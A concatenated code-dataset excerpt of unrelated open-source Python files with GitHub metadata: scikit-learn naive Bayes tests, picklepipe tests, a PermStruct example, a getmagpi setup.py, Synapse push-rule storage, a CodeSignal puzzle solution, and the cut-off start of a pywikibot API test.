y_pred2 = clf2.predict(X)
assert_array_equal(y_pred2, y2)
y_pred_proba2 = clf2.predict_proba(X)
y_pred_log_proba2 = clf2.predict_log_proba(X)
assert_array_almost_equal(np.log(y_pred_proba2), y_pred_log_proba2, 8)
assert_array_almost_equal(y_pred_proba2, y_pred_proba)
assert_array_almost_equal(y_pred_log_proba2, y_pred_log_proba)
# Partial fit on the whole data at once should be the same as fit too
clf3 = MultinomialNB()
clf3.partial_fit(X, y2, classes=np.unique(y2))
y_pred3 = clf3.predict(X)
assert_array_equal(y_pred3, y2)
y_pred_proba3 = clf3.predict_proba(X)
y_pred_log_proba3 = clf3.predict_log_proba(X)
assert_array_almost_equal(np.log(y_pred_proba3), y_pred_log_proba3, 8)
assert_array_almost_equal(y_pred_proba3, y_pred_proba)
assert_array_almost_equal(y_pred_log_proba3, y_pred_log_proba)
def check_partial_fit(cls):
clf1 = cls()
clf1.fit([[0, 1], [1, 0]], [0, 1])
clf2 = cls()
clf2.partial_fit([[0, 1], [1, 0]], [0, 1], classes=[0, 1])
assert_array_equal(clf1.class_count_, clf2.class_count_)
assert_array_equal(clf1.feature_count_, clf2.feature_count_)
clf3 = cls()
clf3.partial_fit([[0, 1]], [0], classes=[0, 1])
clf3.partial_fit([[1, 0]], [1])
assert_array_equal(clf1.class_count_, clf3.class_count_)
assert_array_equal(clf1.feature_count_, clf3.feature_count_)
def test_discretenb_partial_fit():
for cls in [MultinomialNB, BernoulliNB]:
yield check_partial_fit, cls
def test_gnb_partial_fit():
clf = GaussianNB().fit(X, y)
clf_pf = GaussianNB().partial_fit(X, y, np.unique(y))
assert_array_almost_equal(clf.theta_, clf_pf.theta_)
assert_array_almost_equal(clf.sigma_, clf_pf.sigma_)
assert_array_almost_equal(clf.class_prior_, clf_pf.class_prior_)
clf_pf2 = GaussianNB().partial_fit(X[0::2, :], y[0::2], np.unique(y))
clf_pf2.partial_fit(X[1::2], y[1::2])
assert_array_almost_equal(clf.theta_, clf_pf2.theta_)
assert_array_almost_equal(clf.sigma_, clf_pf2.sigma_)
assert_array_almost_equal(clf.class_prior_, clf_pf2.class_prior_)
def test_discretenb_pickle():
# Test picklability of discrete naive Bayes classifiers
for cls in [BernoulliNB, MultinomialNB, GaussianNB]:
clf = cls().fit(X2, y2)
y_pred = clf.predict(X2)
store = BytesIO()
pickle.dump(clf, store)
clf = pickle.load(BytesIO(store.getvalue()))
assert_array_equal(y_pred, clf.predict(X2))
if cls is not GaussianNB:
# TODO re-enable me when partial_fit is implemented for GaussianNB
# Test pickling of estimator trained with partial_fit
clf2 = cls().partial_fit(X2[:3], y2[:3], classes=np.unique(y2))
clf2.partial_fit(X2[3:], y2[3:])
store = BytesIO()
pickle.dump(clf2, store)
clf2 = pickle.load(BytesIO(store.getvalue()))
assert_array_equal(y_pred, clf2.predict(X2))
def test_input_check_fit():
# Test input checks for the fit method
for cls in [BernoulliNB, MultinomialNB, GaussianNB]:
# check shape consistency for number of samples at fit time
assert_raises(ValueError, cls().fit, X2, y2[:-1])
# check shape consistency for number of input features at predict time
clf = cls().fit(X2, y2)
assert_raises(ValueError, clf.predict, X2[:, :-1])
def test_input_check_partial_fit():
for cls in [BernoulliNB, MultinomialNB]:
# check shape consistency
assert_raises(ValueError, cls().partial_fit, X2, y2[:-1],
classes=np.unique(y2))
# classes is required for first call to partial fit
assert_raises(ValueError, cls().partial_fit, X2, y2)
# check consistency of consecutive classes values
clf = cls()
clf.partial_fit(X2, y2, classes=np.unique(y2))
assert_raises(ValueError, clf.partial_fit, X2, y2,
classes=np.arange(42))
# check consistency of input shape for partial_fit
assert_raises(ValueError, clf.partial_fit, X2[:, :-1], y2)
# check consistency of input shape for predict
assert_raises(ValueError, clf.predict, X2[:, :-1])
def test_discretenb_predict_proba():
# Test discrete NB classes' probability scores
# The 100s below distinguish Bernoulli from multinomial.
# FIXME: write a test to show this.
X_bernoulli = [[1, 100, 0], [0, 1, 0], [0, 100, 1]]
X_multinomial = [[0, 1], [1, 3], [4, 0]]
# test binary case (1-d output)
y = [0, 0, 2] # 2 is regression test for binary case, 02e673
for cls, X in zip([BernoulliNB, MultinomialNB],
[X_bernoulli, X_multinomial]):
clf = cls().fit(X, y)
assert_equal(clf.predict(X[-1:]), 2)
assert_equal(clf.predict_proba([X[0]]).shape, (1, 2))
assert_array_almost_equal(clf.predict_proba(X[:2]).sum(axis=1),
np.array([1., 1.]), 6)
# test multiclass case (2-d output, must sum to one)
y = [0, 1, 2]
for cls, X in zip([BernoulliNB, MultinomialNB],
[X_bernoulli, X_multinomial]):
clf = cls().fit(X, y)
assert_equal(clf.predict_proba(X[0:1]).shape, (1, 3))
assert_equal(clf.predict_proba(X[:2]).shape, (2, 3))
assert_almost_equal(np.sum(clf.predict_proba([X[1]])), 1)
assert_almost_equal(np.sum(clf.predict_proba([X[-1]])), 1)
assert_almost_equal(np.sum(np.exp(clf.class_log_prior_)), 1)
assert_almost_equal(np.sum(np.exp(clf.intercept_)), 1)
def test_discretenb_uniform_prior():
# Test whether discrete NB classes fit a uniform prior
# when fit_prior=False and class_prior=None
for cls in [BernoulliNB, MultinomialNB]:
clf = cls()
clf.set_params(fit_prior=False)
clf.fit([[0], [0], [1]], [0, 0, 1])
prior = np.exp(clf.class_log_prior_)
assert_array_equal(prior, np.array([.5, .5]))
def test_discretenb_provide_prior():
# Test whether discrete NB classes use provided prior
for cls in [BernoulliNB, MultinomialNB]:
clf = cls(class_prior=[0.5, 0.5])
clf.fit([[0], [0], [1]], [0, 0, 1])
prior = np.exp(clf.class_log_prior_)
assert_array_equal(prior, np.array([.5, .5]))
# Inconsistent number of classes with prior
assert_raises(ValueError, clf.fit, [[0], [1], [2]], [0, 1, 2])
assert_raises(ValueError, clf.partial_fit, [[0], [1]], [0, 1],
classes=[0, 1, 1])
def test_discretenb_provide_prior_with_partial_fit():
# Test whether discrete NB classes use provided prior
# when using partial_fit
iris = load_iris()
iris_data1, iris_data2, iris_target1, iris_target2 = train_test_split(
iris.data, iris.target, test_size=0.4, random_state=415)
for cls in [BernoulliNB, MultinomialNB]:
for prior in [None, [0.3, 0.3, 0.4]]:
clf_full = cls(class_prior=prior)
clf_full.fit(iris.data, iris.target)
clf_partial = cls(class_prior=prior)
clf_partial.partial_fit(iris_data1, iris_target1,
classes=[0, 1, 2])
clf_partial.partial_fit(iris_data2, iris_target2)
assert_array_almost_equal(clf_full.class_log_prior_,
clf_partial.class_log_prior_)
def test_sample_weight_multiclass():
for cls in [BernoulliNB, MultinomialNB]:
# check shape consistency for number of samples at fit time
yield check_sample_weight_multiclass, cls
def check_sample_weight_multiclass(cls):
X = [
[0, 0, 1],
[0, 1, 1],
[0, 1, 1],
[1, 0, 0],
]
y = [0, 0, 1, 2]
sample_weight = np.array([1, 1, 2, 2], dtype=np.float64)
sample_weight /= sample_weight.sum()
clf = cls().fit(X, y, sample_weight=sample_weight)
assert_array_equal(clf.predict(X), [0, 1, 1, 2])
# Check sample weight using the partial_fit method
clf = cls()
clf.partial_fit(X[:2], y[:2], classes=[0, 1, 2],
sample_weight=sample_weight[:2])
clf.partial_fit(X[2:3], y[2:3], sample_weight=sample_weight[2:3])
clf.partial_fit(X[3:], y[3:], sample_weight=sample_weight[3:])
assert_array_equal(clf.predict(X), [0, 1, 1, 2])
def test_sample_weight_mnb():
clf = MultinomialNB()
clf.fit([[1, 2], [1, 2], [1, 0]],
[0, 0, 1],
sample_weight=[1, 1, 4])
assert_array_equal(clf.predict([[1, 0]]), [1])
positive_prior = np.exp(clf.intercept_[0])
assert_array_almost_equal([1 - positive_prior, positive_prior],
[1 / 3., 2 / 3.])
def test_coef_intercept_shape():
# coef_ and intercept_ should have shapes as in other linear models.
# Non-regression test for issue #2127.
X = [[1, 0, 0], [1, 1, 1]]
y = [1, 2] # binary classification
for clf in [MultinomialNB(), BernoulliNB()]:
clf.fit(X, y)
assert_equal(clf.coef_.shape, (1, 3))
assert_equal(clf.intercept_.shape, (1,))
def test_check_accuracy_on_digits():
# Non regression test to make sure that any further refactoring / optim
# of the NB models do not harm the performance on a slightly non-linearly
# separable dataset
digits = load_digits()
X, y = digits.data, digits.target
binary_3v8 = np.logical_or(digits.target == 3, digits.target == 8)
X_3v8, y_3v8 = X[binary_3v8], y[binary_3v8]
# Multinomial NB
scores = cross_val_score(MultinomialNB(alpha=10), X, y, cv=10)
assert_greater(scores.mean(), 0.86)
scores = cross_val_score(MultinomialNB(alpha=10), X_3v8, y_3v8, cv=10)
assert_greater(scores.mean(), 0.94)
# Bernoulli NB
scores = cross_val_score(BernoulliNB(alpha=10), X > 4, y, cv=10)
assert_greater(scores.mean(), 0.83)
scores = cross_val_score(BernoulliNB(alpha=10), X_3v8 > 4, y_3v8, cv=10)
assert_greater(scores.mean(), 0.92)
# Gaussian NB
scores = cross_val_score(GaussianNB(), X, y, cv=10)
assert_greater(scores.mean(), 0.77)
scores = cross_val_score(GaussianNB(), X_3v8, y_3v8, cv=10)
assert_greater(scores.mean(), 0.86)
def test_feature_log_prob_bnb():
# Test for issue #4268.
# Tests that the feature log prob value computed by BernoulliNB when
# alpha=1.0 is equal to the expression given in Manning, Raghavan,
# and Schuetze's "Introduction to Information Retrieval" book:
# http://nlp.stanford.edu/IR-book/html/htmledition/the-bernoulli-model-1.html
X = np.array([[0, 0, 0], [1, 1, 0], [0, 1, 0], [1, 0, 1], [0, 1, 0]])
Y = np.array([0, 0, 1, 2, 2])
# Fit Bernoulli NB w/ alpha = 1.0
clf = BernoulliNB(alpha=1.0)
clf.fit(X, Y)
# Manually form the (log) numerator and denominator that
# constitute P(feature presence | class)
num = np.log(clf.feature_count_ + 1.0)
denom = np.tile(np.log(clf.class_count_ + 2.0), (X.shape[1], 1)).T
# Check manual estimate matches
assert_array_almost_equal(clf.feature_log_prob_, (num - denom))
def test_bnb():
# Tests that BernoulliNB when alpha=1.0 gives the same values as
# those given for the toy example in Manning, Raghavan, and
# Schuetze's "Introduction to Information Retrieval" book:
# http://nlp.stanford.edu/IR-book/html/htmledition/the-bernoulli-model-1.html
# Training data points are:
# Chinese Beijing Chinese (class: China)
# Chinese Chinese Shanghai (class: China)
# Chinese Macao (class: China)
# Tokyo Japan Chinese (class: Japan)
# Features are Beijing, Chinese, Japan, Macao, Shanghai, and Tokyo
X = np.array([[1, 1, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0],
[0, 1, 0, 1, 0, 0],
[0, 1, 1, 0, 0, 1]])
# Classes are China (0), Japan (1)
Y = np.array([0, 0, 0, 1])
# Fit BernoulliBN w/ alpha = 1.0
clf = BernoulliNB(alpha=1.0)
clf.fit(X, Y)
# Check the class prior is correct
class_prior = np.array([0.75, 0.25])
assert_array_almost_equal(np.exp(clf.class_log_prior_), class_prior)
# Check the feature probabilities are correct
feature_prob = np.array([[0.4, 0.8, 0.2, 0.4, 0.4, 0.2],
[1/3.0, 2/3.0, 2/3.0, 1/3.0, 1/3.0, 2/3.0]])
assert_array_almost_equal(np.exp(clf.feature_log_prob_), feature_prob)
# Testing data point is:
# Chinese Chinese Chinese Tokyo Japan
X_test = np.array([[0, 1, 1, 0, 0, 1]])
# Check the predictive probabilities are correct
unnorm_predict_proba = np.array([[0.005183999999999999,
0.02194787379972565]])
predict_proba = unnorm_predict_proba / np.sum(unnorm_predict_proba)
assert_array_almost_equal(clf.predict_proba(X_test), predict_proba)
def test_naive_bayes_scale_invariance():
# Scaling the data should not change the prediction results
iris = load_iris()
X, y = iris.data, iris.target
labels = [GaussianNB().fit(f * X, y).predict(f * X)
for f in [1E-10, 1, 1E10]]
assert_array_equal(labels[0], labels[1])
assert_array_equal(labels[1], labels[2])
def test_alpha():
# Setting alpha=0 should not output nan results when p(x_i|y_j)=0 is a case
X = np.array([[1, 0], [1, 1]])
y = np.array([0, 1])
nb = BernoulliNB(alpha=0.)
assert_warns(UserWarning, nb.partial_fit, X, y, classes=[0, 1])
assert_warns(UserWarning, nb.fit, X, y)
prob = np.array([[1, 0], [0, 1]])
assert_array_almost_equal(nb.predict_proba(X), prob)
nb = MultinomialNB(alpha=0.)
assert_warns(UserWarning, nb.partial_fit, X, y, classes=[0, 1])
assert_warns(UserWarning, nb.fit, X, y)
prob = np.array([[2./3, 1./3], [0, 1]])
assert_array_almost_equal(nb.predict_proba(X), prob)
# Test sparse X
X = scipy.sparse.csr_matrix(X)
nb = BernoulliNB(alpha=0.)
assert_warns(UserWarning, nb.fit, X, y)
prob = np.array([[1, 0], [0, 1]])
assert_array_almost_equal(nb.predict_proba(X), prob)
nb = MultinomialNB(alpha=0.)
assert_warns(UserWarning, nb.fit, X, y)
prob = np.array([[2./3, 1./3], [0, 1]])
assert_array_almost_equal(nb.predict_proba(X), prob)
# Test for alpha < 0
X = np.array([[1, 0], [1, 1]])
y = np.array([0, 1])
expected_msg = ('Smoothing parameter alpha = -1.0e-01. '
'alpha should be > 0.')
b_nb = BernoulliNB(alpha=-0.1)
m_nb = MultinomialNB(alpha=-0.1)
assert_raise_message(ValueError, expected_msg, b_nb.fit, X, y)
assert_raise_message(ValueError, expected_msg, m_nb.fit, X, y)
b_nb = BernoulliNB(alpha=-0.1)
m_nb = MultinomialNB(alpha=-0.1)
assert_raise_message(ValueError, expected_msg, b_nb.partial_fit,
X, y, classes=[0, 1])
assert_raise_message(ValueError, expected_msg, m_nb.partial_fit,
X, y, classes=[0, 1])
| {
"content_hash": "a8d991f06ee3abcaa8e8e89a7f96f377",
"timestamp": "",
"source": "github",
"line_count": 586,
"max_line_length": 81,
"avg_line_length": 37.2098976109215,
"alnum_prop": 0.6187571657876634,
"repo_name": "rvraghav93/scikit-learn",
"id": "f43ddf0a0c553cf502a5e373476b8d64a8c9505e",
"size": "21805",
"binary": false,
"copies": "11",
"ref": "refs/heads/master",
"path": "sklearn/tests/test_naive_bayes.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "C",
"bytes": "394787"
},
{
"name": "C++",
"bytes": "140225"
},
{
"name": "Makefile",
"bytes": "1579"
},
{
"name": "PowerShell",
"bytes": "17042"
},
{
"name": "Python",
"bytes": "6420784"
},
{
"name": "Shell",
"bytes": "9256"
}
],
"symlink_target": ""
} |
import json
import socket
import unittest
import picklepipe
def _safe_close(pipe):
try:
pipe.close()
except:
pass
class TestJSONPipe(unittest.TestCase):
def make_pipe_pair(self):
rd, wr = picklepipe.make_pipe_pair(picklepipe.JSONPipe)
assert isinstance(rd, picklepipe.BaseSerializingPipe)
assert isinstance(wr, picklepipe.BaseSerializingPipe)
self.addCleanup(_safe_close, rd)
self.addCleanup(_safe_close, wr)
return rd, wr
def make_socketpair(self):
from picklepipe.socketpair import socketpair
return socketpair()
def test_send_jsonable_objects(self):
objects = ['abc',
1,
[1, '2', [3]],
{'a': ['b', 1, {'c': 'd', 'e': [2, 'f']}]}]
for obj in objects:
rd, wr = self.make_pipe_pair()
wr.send_object(obj)
self.assertEqual(obj, rd.recv_object(timeout=0.1))
def test_send_non_jsonable_objects(self):
objects = [set(),
socket.socket(),
{'a': [1, 2, '3', object()]}]
for obj in objects:
rd, wr = self.make_pipe_pair()
try:
wr.send_object(obj)
except picklepipe.PipeSerializingError as e:
self.assertIsInstance(e.exception, TypeError)
else:
self.fail('Didn\'t raise picklepipe.PipeSerializingError')
| {
"content_hash": "eed7d073df2a660acfd7da02aec5ce90",
"timestamp": "",
"source": "github",
"line_count": 48,
"max_line_length": 74,
"avg_line_length": 30.5,
"alnum_prop": 0.5505464480874317,
"repo_name": "SethMichaelLarson/picklepipe",
"id": "dc0afb6470b13cbbae196b96aa3734cd2128073e",
"size": "1464",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_json_pipe.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "PowerShell",
"bytes": "7194"
},
{
"name": "Python",
"bytes": "30952"
},
{
"name": "Shell",
"bytes": "1305"
}
],
"symlink_target": ""
} |
from __future__ import print_function
from permuta import *
import permstruct
import permstruct.dag
from permstruct import *
from permstruct.dag import taylor_dag
import sys
is_classical = True
# -- Examples from Vatter paper -- #
# STATUS ================================================ >
patts = map(Permutation, [[2, 1, 4, 3], [3, 1, 4, 2], [3, 2, 1]])
# ------------------------------------------------------------------------------
perm_bound = 5
verify_bound = 10
ignored = 0
# The dag
max_len_patt = 3
upper_bound = None
remove = False
# Grids
max_rule_size = (5, 5)
max_non_empty = 5
max_rules = None
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
settings = StructSettings(
perm_bound=perm_bound,
verify_bound=verify_bound,
max_rule_size=max_rule_size,
max_non_empty=max_non_empty,
max_rules=max_rules,
verbosity=StructLogger.INFO)
# settings.set_input(StructInput.from_avoidance(settings, patts))
settings.set_input(AvoiderInput(settings, patts))
settings.set_dag(taylor_dag(settings,
max_len_patt=max_len_patt,
remove=remove,
upper_bound=upper_bound))
exhaustive(settings)
| {
"content_hash": "83d9cab498bf42148b4e6c088986459a",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 80,
"avg_line_length": 26.8,
"alnum_prop": 0.5022388059701492,
"repo_name": "PermutaTriangle/PermStruct",
"id": "68b762ae815951d629c9938dbe1187e1fc9cab95",
"size": "1340",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/classical_computing_non_poly_bases/b13.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Haskell",
"bytes": "891"
},
{
"name": "Makefile",
"bytes": "381"
},
{
"name": "Python",
"bytes": "898912"
}
],
"symlink_target": ""
} |
import io
import os
import sys
from codecs import open
from setuptools import setup, find_packages, Command
from shutil import rmtree
# General Attributes and Requirements
NAME = 'getmagpi'
DESCRIPTION = 'A simple utility to synchronize free MagPi PDF content.'
URL = 'https://jnario.github.io/getmagpi/'
EMAIL = 'jose@nario.com',
AUTHOR = 'Jose Nario',
REQUIRED = ['requests', 'beautifulsoup4']
here = os.path.abspath(os.path.dirname(__file__))
# Long Description -- remember to add readme to MANIFEST.IN
with io.open(os.path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = '\n' + f.read()
# Version
about = {}
with open(os.path.join(here, NAME, '__version__.py')) as f:
exec(f.read(), about)
class PublishCommand(Command):
"""Support setup.py publish."""
description = 'Build and publish the package.'
user_options = []
@staticmethod
def status(s):
"""Prints things in bold."""
print('\033[1m{0}\033[0m'.format(s))
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
try:
self.status('Removing previous builds…')
rmtree(os.path.join(here, 'dist'))
except FileNotFoundError:
pass
self.status('Building Source and Wheel (universal) distribution…')
os.system('{0} setup.py sdist bdist_wheel --universal'.format(sys.executable))
self.status('Uploading the package to PyPi via Twine…')
os.system('twine upload dist/*')
sys.exit()
setup(
name=NAME,
version=about['__version__'],
description=DESCRIPTION,
long_description=long_description,
author=AUTHOR,
author_email=EMAIL,
url=URL,
# Packages (one or the other)
# packages=find_packages(exclude=['contrib', 'docs', 'tests']),
py_modules=['getmagpi'],
# entry_points={
# 'console_scripts': [
# 'getmagpi = getmagpi:main'
# ],
# },
install_requires=REQUIRED,
include_package_date=True,
license='MIT',
keywords='magpi raspberrypi library',
classifiers=[
# Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers
'Development Status :: 3 - Alpha',
'Environment :: Console',
'Intended Audience :: Developers',
'Intended Audience :: End Users/Desktop',
'Topic :: Internet',
'Topic :: Internet :: WWW/HTTP :: HTTP Servers',
'Topic :: System :: Archiving :: Mirroring',
'Topic :: Utilities',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
# $ setup.py publish support.
cmdclass={
'publish': PublishCommand,
},
) | {
"content_hash": "2406ab732de08129476ad63c1bb677dc",
"timestamp": "",
"source": "github",
"line_count": 104,
"max_line_length": 86,
"avg_line_length": 28.23076923076923,
"alnum_prop": 0.6130790190735694,
"repo_name": "jnario/getmagpi",
"id": "5790289265b0254843918585ce3cab362fc51ee5",
"size": "2978",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7231"
}
],
"symlink_target": ""
} |
from ._base import SQLBaseStore, cached
from twisted.internet import defer
import logging
import simplejson as json
logger = logging.getLogger(__name__)
class PushRuleStore(SQLBaseStore):
@cached()
@defer.inlineCallbacks
def get_push_rules_for_user(self, user_name):
rows = yield self._simple_select_list(
table=PushRuleTable.table_name,
keyvalues={
"user_name": user_name,
},
retcols=PushRuleTable.fields,
desc="get_push_rules_enabled_for_user",
)
rows.sort(
key=lambda row: (-int(row["priority_class"]), -int(row["priority"]))
)
defer.returnValue(rows)
@cached()
@defer.inlineCallbacks
def get_push_rules_enabled_for_user(self, user_name):
results = yield self._simple_select_list(
table=PushRuleEnableTable.table_name,
keyvalues={
'user_name': user_name
},
retcols=PushRuleEnableTable.fields,
desc="get_push_rules_enabled_for_user",
)
defer.returnValue({
r['rule_id']: False if r['enabled'] == 0 else True for r in results
})
@defer.inlineCallbacks
def add_push_rule(self, before, after, **kwargs):
vals = kwargs
if 'conditions' in vals:
vals['conditions'] = json.dumps(vals['conditions'])
if 'actions' in vals:
vals['actions'] = json.dumps(vals['actions'])
# we could check the rest of the keys are valid column names
# but sqlite will do that anyway so I think it's just pointless.
vals.pop("id", None)
if before or after:
ret = yield self.runInteraction(
"_add_push_rule_relative_txn",
self._add_push_rule_relative_txn,
before=before,
after=after,
**vals
)
defer.returnValue(ret)
else:
ret = yield self.runInteraction(
"_add_push_rule_highest_priority_txn",
self._add_push_rule_highest_priority_txn,
**vals
)
defer.returnValue(ret)
def _add_push_rule_relative_txn(self, txn, user_name, **kwargs):
after = kwargs.pop("after", None)
relative_to_rule = kwargs.pop("before", after)
res = self._simple_select_one_txn(
txn,
table=PushRuleTable.table_name,
keyvalues={
"user_name": user_name,
"rule_id": relative_to_rule,
},
retcols=["priority_class", "priority"],
allow_none=True,
)
if not res:
raise RuleNotFoundException(
"before/after rule not found: %s" % (relative_to_rule,)
)
priority_class = res["priority_class"]
base_rule_priority = res["priority"]
if 'priority_class' in kwargs and kwargs['priority_class'] != priority_class:
raise InconsistentRuleException(
"Given priority class does not match class of relative rule"
)
new_rule = kwargs
new_rule.pop("before", None)
new_rule.pop("after", None)
new_rule['priority_class'] = priority_class
new_rule['user_name'] = user_name
new_rule['id'] = self._push_rule_id_gen.get_next_txn(txn)
# check if the priority before/after is free
new_rule_priority = base_rule_priority
if after:
new_rule_priority -= 1
else:
new_rule_priority += 1
new_rule['priority'] = new_rule_priority
sql = (
"SELECT COUNT(*) FROM " + PushRuleTable.table_name +
" WHERE user_name = ? AND priority_class = ? AND priority = ?"
)
txn.execute(sql, (user_name, priority_class, new_rule_priority))
res = txn.fetchall()
num_conflicting = res[0][0]
# if there are conflicting rules, bump everything
if num_conflicting:
sql = "UPDATE "+PushRuleTable.table_name+" SET priority = priority "
if after:
sql += "-1"
else:
sql += "+1"
sql += " WHERE user_name = ? AND priority_class = ? AND priority "
if after:
sql += "<= ?"
else:
sql += ">= ?"
txn.execute(sql, (user_name, priority_class, new_rule_priority))
txn.call_after(
self.get_push_rules_for_user.invalidate, user_name
)
txn.call_after(
self.get_push_rules_enabled_for_user.invalidate, user_name
)
self._simple_insert_txn(
txn,
table=PushRuleTable.table_name,
values=new_rule,
)
def _add_push_rule_highest_priority_txn(self, txn, user_name,
priority_class, **kwargs):
# find the highest priority rule in that class
sql = (
"SELECT COUNT(*), MAX(priority) FROM " + PushRuleTable.table_name +
" WHERE user_name = ? and priority_class = ?"
)
txn.execute(sql, (user_name, priority_class))
res = txn.fetchall()
(how_many, highest_prio) = res[0]
new_prio = 0
if how_many > 0:
new_prio = highest_prio + 1
# and insert the new rule
new_rule = kwargs
new_rule['id'] = self._push_rule_id_gen.get_next_txn(txn)
new_rule['user_name'] = user_name
new_rule['priority_class'] = priority_class
new_rule['priority'] = new_prio
txn.call_after(
self.get_push_rules_for_user.invalidate, user_name
)
txn.call_after(
self.get_push_rules_enabled_for_user.invalidate, user_name
)
self._simple_insert_txn(
txn,
table=PushRuleTable.table_name,
values=new_rule,
)
@defer.inlineCallbacks
def delete_push_rule(self, user_name, rule_id):
"""
Delete a push rule. Args specify the row to be deleted and can be
any of the columns in the push_rule table, but below are the
standard ones
Args:
user_name (str): The matrix ID of the push rule owner
rule_id (str): The rule_id of the rule to be deleted
"""
yield self._simple_delete_one(
PushRuleTable.table_name,
{'user_name': user_name, 'rule_id': rule_id},
desc="delete_push_rule",
)
self.get_push_rules_for_user.invalidate(user_name)
self.get_push_rules_enabled_for_user.invalidate(user_name)
@defer.inlineCallbacks
def set_push_rule_enabled(self, user_name, rule_id, enabled):
ret = yield self.runInteraction(
"_set_push_rule_enabled_txn",
self._set_push_rule_enabled_txn,
user_name, rule_id, enabled
)
defer.returnValue(ret)
def _set_push_rule_enabled_txn(self, txn, user_name, rule_id, enabled):
new_id = self._push_rules_enable_id_gen.get_next_txn(txn)
self._simple_upsert_txn(
txn,
PushRuleEnableTable.table_name,
{'user_name': user_name, 'rule_id': rule_id},
{'enabled': 1 if enabled else 0},
{'id': new_id},
)
txn.call_after(
self.get_push_rules_for_user.invalidate, user_name
)
txn.call_after(
self.get_push_rules_enabled_for_user.invalidate, user_name
)
class RuleNotFoundException(Exception):
pass
class InconsistentRuleException(Exception):
pass
class PushRuleTable(object):
table_name = "push_rules"
fields = [
"id",
"user_name",
"rule_id",
"priority_class",
"priority",
"conditions",
"actions",
]
class PushRuleEnableTable(object):
table_name = "push_rules_enable"
fields = [
"user_name",
"rule_id",
"enabled"
]
| {
"content_hash": "0bea265702ed5effc7be5db592f47dc7",
"timestamp": "",
"source": "github",
"line_count": 264,
"max_line_length": 85,
"avg_line_length": 30.693181818181817,
"alnum_prop": 0.5418980624460077,
"repo_name": "illicitonion/synapse",
"id": "4cac118d17c9965c9d9f9f34710e62015bc59762",
"size": "8706",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "synapse/storage/push_rule.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "1020"
},
{
"name": "HTML",
"bytes": "1223"
},
{
"name": "JavaScript",
"bytes": "172643"
},
{
"name": "Perl",
"bytes": "31420"
},
{
"name": "Python",
"bytes": "1571632"
},
{
"name": "Shell",
"bytes": "3281"
}
],
"symlink_target": ""
} |
def allianceVersusMonster(health_points, attack_damage):
monster_hp = health_points[0]
monster_dm = attack_damage[0]
soldiers_hp = health_points[1:]
soldiers_dm = attack_damage[1:]
soldiers = [(soldiers_dm[i], soldiers_hp[i]) for i in range(len(soldiers_hp))]
# Attack with the most powerful soldier right before its counter-attacked
# by the monster so it will die. Then try with the second most powerful warrior
# and so on. Then when all the warriors need only one hit from the monster to
# die, start again from the most powerful one until the monster is dead, or
# until all your warriors are dead.
soldiers = sorted(soldiers)[::-1]
total = len(soldiers)
soldier_idx = 0
# While monster is still alive and we still have soldiers...
while monster_hp > 0 and soldier_idx < len(soldiers):
soldier_dm, soldier_hp = soldiers[soldier_idx]
# Check how many consecutive times can the soldier attack the monster
# before the soldier is killed.
if soldier_hp / (monster_dm + 0.0) > 1:
times = soldier_hp / (monster_dm + 0.0)
# If divides exactly, attack one time less.
if times.is_integer():
times -= 1
times = int(times)
monster_damage = times * soldier_dm
soldier_damage = times * monster_dm
monster_hp -= monster_damage
soldiers[soldier_idx] = (soldier_dm, soldier_hp - soldier_damage)
soldier_idx += 1
# If after this the monster is still alive, prepare for a last round
# of attacks.
soldier_idx = 0
while monster_hp > 0 and total > 0 and soldier_idx < len(soldiers):
soldier_dm, soldier_hp = soldiers[soldier_idx]
# We know this soldier will die for sure so just take damage
# from the monster in a last attack.
monster_hp -= soldier_dm
# Only if the monster is dead then it can counterattack.
if (monster_hp > 0):
total -= 1
soldier_idx += 1
return total
| {
"content_hash": "a53f20f0c20907157c21af75ba96325e",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 83,
"avg_line_length": 43.851063829787236,
"alnum_prop": 0.62882096069869,
"repo_name": "zubie7a/Algorithms",
"id": "3e1ac18210c46af8cefdbf955b3ece9749969ff6",
"size": "2130",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "CodeSignal/Challenges/MZ/01_Alliance_Versus_Monster.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "281393"
},
{
"name": "Perl",
"bytes": "75318"
},
{
"name": "Python",
"bytes": "289075"
}
],
"symlink_target": ""
} |
"""API test module."""
#
# (C) Pywikibot team, 2007-2015
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, unicode_literals
__version__ = '$Id$'
import datetime
import types
import pywikibot.data.api as api
import pywikibot.family
import pywikibot.login
import pywikibot.page
import pywikibot.site
from pywikibot.tools import (
MediaWikiVersion,
PY2,
UnicodeType,
)
from tests.aspects import (
unittest,
TestCase,
DefaultSiteTestCase,
DefaultDrySiteTestCase,
)
from tests.utils import allowed_failure, FakeLoginManager, PatchedHttp
if not PY2:
from urllib.parse import unquote_to_bytes
else:
from urllib import unquote_plus as unquote_to_bytes
class TestAPIMWException(DefaultSiteTestCase):
"""Test raising an APIMWException."""
data = {'error': {'code': 'internal_api_error_fake',
'info': 'Fake error message'},
'servedby': 'unittest',
}
def _dummy_request(self, **kwargs):
self.assertIn('body', kwargs)
self.assertIn('uri', kwargs)
self.assertIn('site', kwargs)
if kwargs['body'] is None:
# use uri and remove script path
parameters = kwargs['uri']
